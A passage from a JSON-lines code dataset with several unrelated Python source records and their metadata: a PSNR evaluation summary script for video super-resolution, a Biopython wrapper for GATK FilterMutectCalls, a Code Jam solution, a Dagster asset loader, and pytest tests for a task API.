lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n bilinear_log_path = os.path.join(content_dir, 'log', lr_video_name, self.postfix, 'quality.txt')\n cache_log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'quality.txt')\n sr_log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, 'quality.txt')\n\n psnr_gains = []\n psnr_margins = []\n with open(bilinear_log_path, 'r') as f1, open(cache_log_path, 'r') as f2, open(sr_log_path, 'r') as f3:\n lines1, lines2, lines3 = f1.readlines(), f2.readlines(), f3.readlines()\n for line1, line2, line3 in zip(lines1, lines2, lines3):\n bilinear_psnr = float(line1.strip().split('\\t')[1])\n cache_psnr = float(line2.strip().split('\\t')[1])\n sr_psnr = float(line3.strip().split('\\t')[1])\n psnr_gain = cache_psnr - bilinear_psnr\n psnr_margin = sr_psnr - cache_psnr\n # TODO: add else\n psnr_gains.append(psnr_gain)\n psnr_margins.append(psnr_margin)\n\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n if int(line[2]) == 1:\n num_anchors += 1\n print(content, algorithm, avg_anchors, num_anchors)\n\n return psnr_gains, psnr_margins\n\n def _load_metadata(self, content, algorithm, num_epochs, epoch_length, avg_anchors):\n # set a video, a model, a cache profile\n content_dir = os.path.join(self.data_dir, content)\n lr_video_name = find_video(os.path.join(content_dir, 'video'), self.video_dataset.input_resolution)\n model = build(args.dnn_dataset)\n cache_profile_name = common.get_log_name(self.video_dataset.names, algorithm, num_epochs, epoch_length, avg_anchors)\n\n log_path = os.path.join(content_dir, 'log', lr_video_name, model.name, self.postfix, cache_profile_name, 'metadata.txt')\n num_anchors = 0\n num_frames = 0\n with open(log_path, 'r') as f:\n lines = f.readlines()\n for line in lines:\n line = line.strip().split('\\t')\n num_frames += 1\n if int(line[2]) == 1:\n num_anchors += 1\n\n return num_anchors, num_frames\n\n # TODO: validate a log using multiple contents\n def run(self):\n date_time = datetime.now().strftime('%m-%d-%Y')\n log_dir = os.path.join(self.data_dir, 'evaluation', date_time, self.video_type, self.dnn_type)\n os.makedirs(log_dir, exist_ok=True)\n\n for algorithm in args.algorithm:\n psnr_gains = {}\n psnr_margins = {}\n num_anchors = {}\n num_frames = {}\n for content in self.video_dataset.names:\n psnr_gains[content] = {}\n psnr_margins[content] = {}\n num_anchors[content] = {}\n num_frames[content] = {}\n psnr_gains['all'] = {}\n psnr_margins['all'] = {}\n for content in self.video_dataset.names:\n for avg_anchors in args.avg_anchors:\n psnr_gains[content][avg_anchors], psnr_margins[content][avg_anchors] = self._load_quality(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n num_anchors[content][avg_anchors], num_frames[content][avg_anchors] = self._load_metadata(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n if avg_anchors not in psnr_gains['all']:\n psnr_gains['all'][avg_anchors], psnr_margins['all'][avg_anchors] = self._load_quality(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n else:\n gain, margin = self._load_quality(content, algorithm, self.num_epochs, self.epoch_length, avg_anchors)\n psnr_gains['all'][avg_anchors] += gain\n psnr_margins['all'][avg_anchors] += margin\n \n log_path = os.path.join(log_dir, 'gain_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_gains[content][avg_anchors])))\n f.write('\\n') \n f.write('all\\t')\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_gains['all'][avg_anchors])))\n f.write('\\n') \n\n log_path = os.path.join(log_dir, 'margin_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_margins[content][avg_anchors])))\n f.write('\\n') \n f.write('all\\t')\n for avg_anchors in args.avg_anchors:\n f.write('{:.4f}\\t'.format(np.average(psnr_margins['all'][avg_anchors])))\n f.write('\\n') \n\n log_path = os.path.join(log_dir, 'fraction_{}.txt'.format(algorithm))\n with open(log_path, 'w') as f:\n # avg\n for content in self.video_dataset.names:\n f.write('{}\\t'.format(content))\n for avg_anchors in args.avg_anchors:\n fraction = num_anchors[content][avg_anchors] / num_frames[content][avg_anchors] * 100\n f.write('{:.4f}\\t'.format(fraction))\n f.write('\\n')\n\n # 90%-tile\n # values = {}\n # for avg_anchors in args.avg_anchors:\n # values[avg_anchors] = []\n # for content in self.video_dataset.names:\n # f.write('{}\\t'.format(content))\n # for avg_anchors in args.avg_anchors:\n # value = np.percentile(psnr_gains[content][avg_anchors], 10)\n # values[avg_anchors].append(value)\n # f.write('{:.4f}\\t'.format(value))\n # f.write('\\n') \n # f.write('all\\t')\n # for avg_anchors in args.avg_anchors:\n # #f.write('{:.4f}\\t'.format(np.percentile(psnr_gains['all'][avg_anchors], 10)))\n # f.write('{:.4f}\\t'.format(np.average(values[avg_anchors])))\n # f.write('\\n') \n\n # 95%-tile\n # values = {}\n # for avg_anchors in args.avg_anchors:\n # values[avg_anchors] = []\n # for content in self.video_dataset.names:\n # f.write('{}\\t'.format(content))\n # for avg_anchors in args.avg_anchors:\n # value = np.percentile(psnr_gains[content][avg_anchors], 5)\n # values[avg_anchors].append(value)\n # f.write('{:.4f}\\t'.format(value))\n # f.write('\\n') \n # f.write('all\\t')\n # for avg_anchors in args.avg_anchors:\n # #f.write('{:.4f}\\t'.format(np.percentile(psnr_gains['all'][avg_anchors], 10)))\n # f.write('{:.4f}\\t'.format(np.average(values[avg_anchors])))\n # f.write('\\n') \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # directory, path\n parser.add_argument('--vpxdec_path', type=str, default=None)\n parser.add_argument('--data_dir', type=str, required=True)\n parser.add_argument('--video_type', type=str, required=True)\n parser.add_argument('--dnn_type', type=str, required=True)\n \n args = parser.parse_args()\n \n # set default parameters\n if args.vpxdec_path is None:\n args.vpxdec_path = os.path.join(os.environ['ENGORGIO_CODE_ROOT'], 'third_party', 'libvpx-nemo', 'bin', 'vpxdec_nemo_ver2')\n assert(os.path.exists(args.vpxdec_path))\n\n # set an evaluation setting\n #args.avg_anchors = [1, 2, 4, 8]\n args.avg_anchors = [2, 4, 8, 16]\n args.epoch_length = 80\n args.total_length = 2000\n # args.algorithm = ['engorgio', 'uniform', 'engorgio_baseline']\n args.algorithm = ['engorgio', 'uniform', 'nemo']\n #args.algorithm = ['engorgio', 'engorgio_baseline']\n args.video_dataset = common.video_datasets[args.video_type]\n args.dnn_dataset = common.dnn_datasets[args.dnn_type]\n\n # run evaluation\n summary = Summary(args)\n summary.run()\n\n", "repo_name": "kaist-ina/neuroscaler-public", "sub_path": "data/anchor/multi_stream/summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 11937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 42, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 70, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "data.video.utility.find_video", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "data.dnn.model.build", "line_number": 108, "usage_type": "call"}, {"api_name": "common.get_log_name", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.average", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 236, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "common.video_datasets", "line_number": 247, "usage_type": "attribute"}, {"api_name": "common.dnn_datasets", "line_number": 248, "usage_type": "attribute"}]} +{"seq_id": "42402794322", "text": "from Bio.Application import _Option, _StaticArgument\nfrom Bio.Application import AbstractCommandline\n\n\nclass FilterMutectCallsCommandline(AbstractCommandline):\n '''\n\ttext\n\t'''\n\n def __init__(self, cmd=\"gatk\", **kwargs):\n self.program_name = cmd\n self.parameters = [\n _StaticArgument(\"FilterMutectCalls\"),\n _Option(\n [\"-V\", \"V\"],\n \"A VCF file containing variants\",\n filename=True,\n is_required=True,\n equate=False\n ),\n _Option(\n [\"-O\", \"O\"],\n \"The output filtered VCF file\",\n is_required=True,\n filename=True,\n equate=False\n ),\n _Option(\n [\"-R\", \"R\"],\n \"Reference sequence file\",\n is_required=True,\n filename=True,\n equate=False\n ),\n _Option(\n [\"--contamination-table\",\n \"contamination\"],\n \"Tables containing contamination information.\",\n filename=True,\n equate=False\n ),\n _Option(\n [\"-ob-priors\", \"ob_priors\"],\n \"One or more .tar.gz files \\n\" +\n \"containing tables of prior artifact probabilities \\n\" +\n \"for the read orientation filter model, \\n\" +\n \"one table per tumor sample\",\n filename=True,\n equate=False\n ),\n _Option(\n [\"--min-allele-fraction\",\n \"min_allele_fraction\"],\n \"Minimum allele fraction required\",\n equate=False\n ),\n _Option(\n [\"--java-options\", \"java_options\"],\n \"set config for java\",\n equate=False\n ),\n ]\n AbstractCommandline.__init__(self, cmd, **kwargs)\n", "repo_name": "XSLiuLab/Seq2Neo", "sub_path": "seq2neo/function/Mutation_Calling/_filtermutectcalls.py", "file_name": "_filtermutectcalls.py", "file_ext": "py", "file_size_in_byte": 1986, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Bio.Application.AbstractCommandline", "line_number": 5, "usage_type": "name"}, {"api_name": "Bio.Application._StaticArgument", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 14, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 21, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 28, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 35, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 42, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 51, "usage_type": "call"}, {"api_name": "Bio.Application._Option", "line_number": 57, "usage_type": "call"}, {"api_name": "Bio.Application.AbstractCommandline.__init__", "line_number": 63, "usage_type": "call"}, {"api_name": "Bio.Application.AbstractCommandline", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "23620754461", "text": "from functools import partial\nfrom itertools import permutations, combinations\nfrom operator import xor\n\nlog = open('log.txt', 'w')\n\ndef writeLog(s):\n pass\n #writeLog(s)\n \ndef memoize(f, cache={}):\n def g(*args, **kwargs):\n key = (f, tuple(args), frozenset(kwargs.items()))\n if key not in cache:\n cache[key] = f(*args, **kwargs)\n return cache[key]\n return g\n\ndef recursive_sum(nested_num_list): \n if len(nested_num_list) == 1:\n return nested_num_list[0]\n return nested_num_list[0] + recursive_sum(nested_num_list[1:])\n\ndef recursive_xor(nested_num_list): \n if len(nested_num_list) == 1:\n return nested_num_list[0]\n return nested_num_list[0] ^ recursive_xor(nested_num_list[1:])\n\n#mreduce = memoize(recursive_xor)\nmreduce = memoize(partial(reduce, xor))\nmsum = memoize(sum)\n \nif __name__=='__main__': \n input_file = open('C-small-0.in', 'r')\n output_file = open('C-small-0.out', 'w')\n \n for line_num, line in enumerate(input_file.readlines()[2::2]):\n candy = map(int, line.split())\n max_sum = -1\n for i in range(1, len(candy)):\n c = combinations(candy, i)\n for i in c:\n i = i\n otherlist = list(candy)\n for b in i:\n otherlist.remove(b)\n writeLog( (i, otherlist))\n XORer, summer = reduce(xor, i), sum(otherlist)\n if XORer == summer:\n sumOfP = sum(i)\n if max_sum < sumOfP:\n max_sum = sumOfP\n \n if max_sum==-1:\n candy_value='NO'\n else:\n candy_value=str(max_sum)\n print >>output_file,'Case #%s: %s' % (line_num+1, str(candy_value))#>>output_file, \n log.close()\n input_file.close()\n output_file.close()\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_76/526.py", "file_name": "526.py", "file_ext": "py", "file_size_in_byte": 1868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functools.partial", "line_number": 30, "usage_type": "call"}, {"api_name": "operator.xor", "line_number": 30, "usage_type": "argument"}, {"api_name": "itertools.combinations", "line_number": 41, "usage_type": "call"}, {"api_name": "operator.xor", "line_number": 48, "usage_type": "argument"}]} +{"seq_id": "29299675208", "text": "from typing import Generator, List\nfrom elx import Runner\nfrom dagster import (\n AssetsDefinition,\n Nothing,\n OpExecutionContext,\n Output,\n multi_asset,\n AssetOut,\n get_dagster_logger,\n)\nfrom elx.extensions.dagster.utils import dagster_safe_name, generate_description\n\nlogger = get_dagster_logger()\n\n\ndef load_assets(runner: Runner) -> List[AssetsDefinition]:\n \"\"\"\n Load the assets for a runner, each asset represents one tap target combination.\n\n Args:\n runner (Runner): The runner to extract from.\n\n Returns:\n List[AssetsDefinition]: The assets.\n \"\"\"\n\n def run_factory(runner: Runner) -> callable:\n \"\"\"\n Create a run function for a runner.\n\n Args:\n runner (Runner): The runner to create a run function for.\n\n Returns:\n callable: The run function that gets executed by Dagster.\n \"\"\"\n\n def run(context: OpExecutionContext) -> Generator[Output, None, None]:\n \"\"\"\n Run a tap target combination.\n\n Args:\n context (OpExecutionContext): The context to run in.\n\n Yields:\n Generator[Output, None, None]: The names of the selected outputs.\n \"\"\"\n # Execute the runner and yield the selected outputs.\n runner.run(\n streams=list(context.selected_output_names),\n logger=logger,\n )\n\n for context_output_name in context.selected_output_names:\n yield Output(\n value=Nothing,\n output_name=context_output_name,\n metadata={\n \"state_path\": f\"{runner.state_manager.base_path}/{runner.state_file_name}\",\n \"state\": runner.load_state(),\n },\n )\n\n return run\n\n return [\n multi_asset(\n name=f\"run_{dagster_safe_name(runner.tap.executable)}_{dagster_safe_name(runner.target.executable)}\",\n outs={\n dagster_safe_name(stream.name): AssetOut(\n is_required=False,\n description=generate_description(runner=runner, stream=stream),\n key_prefix=dagster_safe_name(runner.tap.executable),\n code_version=runner.tap.hash_key,\n )\n for stream in runner.tap.catalog.streams\n if stream.is_selected\n },\n can_subset=True,\n group_name=dagster_safe_name(runner.tap.executable),\n compute_kind=\"python\",\n )(run_factory(runner))\n ]\n", "repo_name": "quantile-development/elx", "sub_path": "elx/extensions/dagster/assets.py", "file_name": "assets.py", "file_ext": "py", "file_size_in_byte": 2639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dagster.get_dagster_logger", "line_number": 14, "usage_type": "call"}, {"api_name": "elx.Runner", "line_number": 17, "usage_type": "name"}, {"api_name": "elx.Runner", "line_number": 28, "usage_type": "name"}, {"api_name": "dagster.OpExecutionContext", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.Output", "line_number": 56, "usage_type": "call"}, {"api_name": "dagster.Nothing", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Generator", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.Output", "line_number": 39, "usage_type": "name"}, {"api_name": "dagster.multi_asset", "line_number": 68, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 69, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 71, "usage_type": "call"}, {"api_name": "dagster.AssetOut", "line_number": 71, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.generate_description", "line_number": 73, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 74, "usage_type": "call"}, {"api_name": "elx.extensions.dagster.utils.dagster_safe_name", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.AssetsDefinition", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "73917619713", "text": "import random\nfrom typing import Dict\n\nimport pytest\nfrom fastapi.testclient import TestClient\n\nfrom app.api.api_v1.api import tasks as m\nfrom app.config import settings\nfrom tests.utils.utils import random_lower_string\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_controller(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_db(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_graph_db(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_viz(mocker):\n return mocker.Mock()\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_stats(mocker):\n return mocker.Mock()\n\n\nclass TestTaskResult:\n def test_get_task_result(\n self, mocker, mock_controller, mock_db, mock_graph_db, mock_viz\n ):\n task_result_proxy = m.TaskResultProxy(\n controller=mock_controller,\n db=mock_db,\n graph_db=mock_graph_db,\n viz=mock_viz,\n stats_client=mock_stats,\n )\n user_id = random.randint(1000, 2000)\n task_hash = random_lower_string(32)\n task_result_proxy.parse_resp = mocker.Mock(\n return_value={\"state\": m.TaskState.done, \"task_id\": task_hash}\n )\n task = mocker.Mock(hash=task_hash)\n mocker.patch.object(m, \"ControllerRequest\", return_value=None)\n result = task_result_proxy.get(task)\n mock_controller.send.assert_called()\n\n def test_save_task_result(self, mocker, mock_controller, mock_db, mock_graph_db):\n task_result_proxy = m.TaskResultProxy(\n controller=mock_controller,\n db=mock_db,\n graph_db=mock_graph_db,\n viz=mock_viz,\n stats_client=mock_stats,\n )\n task_result_proxy.get = mocker.Mock()\n task_hash = random_lower_string(32)\n task_result_proxy.parse_resp = mocker.Mock(\n return_value={\"state\": m.TaskState.done, \"task_id\": task_hash}\n )\n task_result_proxy.send_notification = mocker.Mock()\n task_result_proxy.add_new_model_if_not_exist = mocker.Mock()\n task_result_proxy.add_new_dataset_if_not_exist = mocker.Mock()\n\n task = mocker.Mock(type=m.TaskType.training)\n task_result_proxy.update_task_progress = mocker.Mock(return_value=task)\n\n user_id = random.randint(1000, 2000)\n task_hash = random_lower_string(32)\n task = mocker.Mock(hash=task_hash)\n mocker.patch.object(m, \"ControllerRequest\", return_value=None)\n result = task_result_proxy.get(task)\n task_result_proxy.save(task, result)\n\n def test_get_dataset_info(self, mocker, mock_controller, mock_db, mock_graph_db):\n viz = mocker.Mock()\n keywords = {\"a\": 1, \"b\": 2, \"c\": 3, \"d\": 4}\n items = list(range(random.randint(10, 100)))\n viz.get_assets.return_value = mocker.Mock(\n keywords=keywords, items=items, total=len(items)\n )\n proxy = m.TaskResultProxy(\n controller=mock_controller,\n db=mock_db,\n graph_db=mock_graph_db,\n viz=viz,\n stats_client=mock_stats,\n )\n user_id = random.randint(1000, 2000)\n task_hash = random_lower_string(32)\n result = proxy.get_dataset_info(user_id, task_hash)\n assert result[\"keywords\"] == list(keywords.keys())\n\n\ndef test_get_default_dataset_name():\n task_hash = random_lower_string(32)\n task_name = random_lower_string(10)\n assert m.get_default_record_name(task_hash, task_name) == task_name + \"_\" + task_hash[-6:]\n\n\nclass TestNormalizeParameters:\n def test_normalize_task_parameters_succeed(self, mocker):\n mocker.patch.object(m, \"crud\")\n params = {\n \"some_classes\": [],\n \"some_datasets\": [],\n \"model_id\": 233,\n \"name\": random_lower_string(5),\n \"else\": None,\n }\n res = m.normalize_parameters(mocker.Mock(), random_lower_string(5), params)\n assert \"some_classes\" in res\n assert \"some_datasets\" in res\n assert \"model_hash\" in res\n\n def test_normalize_task_parameters_skip(self, mocker):\n assert (\n m.normalize_parameters(mocker.Mock(), random_lower_string(5), None) is None\n )\n\n\nclass TestUpdateStats:\n user_id = \"0233\"\n\n def test_update_stats_only_update_task_stats(self, mocker):\n stats = mocker.Mock()\n task = mocker.Mock(parameters=None)\n m.update_stats(self.user_id, stats, task)\n stats.update_task_stats.assert_called()\n stats.update_model_rank.assert_not_called()\n\n def test_update_stats_for_model(self, mocker):\n stats = mocker.Mock()\n task = mocker.Mock(parameters={\"model_id\": 1})\n m.update_stats(self.user_id, stats, task)\n stats.update_model_rank.assert_called_with(self.user_id, 1)\n\n def test_update_stats_for_dataset(self, mocker):\n stats = mocker.Mock()\n task = mocker.Mock(parameters={\"datasets\": [233]})\n m.update_stats(self.user_id, stats, task)\n stats.update_dataset_rank.assert_called_with(self.user_id, 233)\n\n\ndef create_task(client, headers):\n j = {\n \"name\": random_lower_string(),\n \"type\": m.TaskType.mining,\n }\n r = client.post(f\"{settings.API_V1_STR}/tasks/\", headers=headers, json=j)\n\n return r\n\n\nclass TestListTasks:\n def test_list_tasks_succeed(\n self, client: TestClient, normal_user_token_headers: Dict[str, str], mocker\n ):\n req = mocker.Mock(task_id=\"task_id_233\")\n mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n for _ in range(3):\n r = create_task(client, normal_user_token_headers)\n r = client.get(\n f\"{settings.API_V1_STR}/tasks/\", headers=normal_user_token_headers\n )\n items = r.json()[\"result\"][\"items\"]\n total = r.json()[\"result\"][\"total\"]\n assert len(items) == total != 0\n\n\nclass TestDeleteTask:\n def test_delete_task(self, client: TestClient, normal_user_token_headers, mocker):\n req = mocker.Mock(task_id=\"task_id_233\")\n mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n r = create_task(client, normal_user_token_headers)\n assert not r.json()[\"result\"][\"is_deleted\"]\n task_id = r.json()[\"result\"][\"id\"]\n r = client.delete(\n f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n )\n assert r.json()[\"result\"][\"is_deleted\"]\n\n\nclass TestChangeTaskName:\n def test_change_task_name(\n self, client: TestClient, normal_user_token_headers, mocker\n ):\n req = mocker.Mock(task_id=\"task_id_233\")\n mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n r = create_task(client, normal_user_token_headers)\n old_name = r.json()[\"result\"][\"name\"]\n task_id = r.json()[\"result\"][\"id\"]\n new_name = random_lower_string(5)\n r = client.patch(\n f\"{settings.API_V1_STR}/tasks/{task_id}\",\n headers=normal_user_token_headers,\n json={\"name\": new_name},\n )\n assert r.json()[\"result\"][\"name\"] == new_name != old_name\n\n\nclass TestGetTask:\n def test_get_single_task(\n self, client: TestClient, normal_user_token_headers, mocker\n ):\n req = mocker.Mock(task_id=\"task_id_233\")\n mocker.patch.object(m, \"ControllerRequest\", return_value=req)\n r = create_task(client, normal_user_token_headers)\n name = r.json()[\"result\"][\"name\"]\n task_id = r.json()[\"result\"][\"id\"]\n\n r = client.get(\n f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n )\n assert r.json()[\"result\"][\"name\"] == name\n\n def test_get_single_task_not_found(\n self, client: TestClient, normal_user_token_headers, mocker\n ):\n task_id = 2333\n r = client.get(\n f\"{settings.API_V1_STR}/tasks/{task_id}\", headers=normal_user_token_headers\n )\n r.status_code == 404\n", "repo_name": "IJtLJZ8Rm4Yr/ymir-backend", "sub_path": "src/pymir-app/tests/api/test_task.py", "file_name": "test_task.py", "file_ext": "py", "file_size_in_byte": 8018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 17, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 41, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 41, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 49, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskState", "line_number": 51, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 51, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 54, "usage_type": "argument"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 59, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 59, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskState", "line_number": 69, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 69, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks.TaskType", "line_number": 75, "usage_type": "attribute"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 75, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 79, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 81, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.TaskResultProxy", "line_number": 92, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 92, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 99, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 100, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 106, "usage_type": "call"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 107, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.get_default_record_name", "line_number": 108, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 108, "usage_type": "name"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 113, "usage_type": "argument"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 118, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.normalize_parameters", "line_number": 121, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 121, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 121, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.normalize_parameters", "line_number": 128, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", "line_number": 128, "usage_type": "name"}, {"api_name": "tests.utils.utils.random_lower_string", "line_number": 128, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks.update_stats", "line_number": 138, "usage_type": "call"}, {"api_name": "app.api.api_v1.api.tasks", 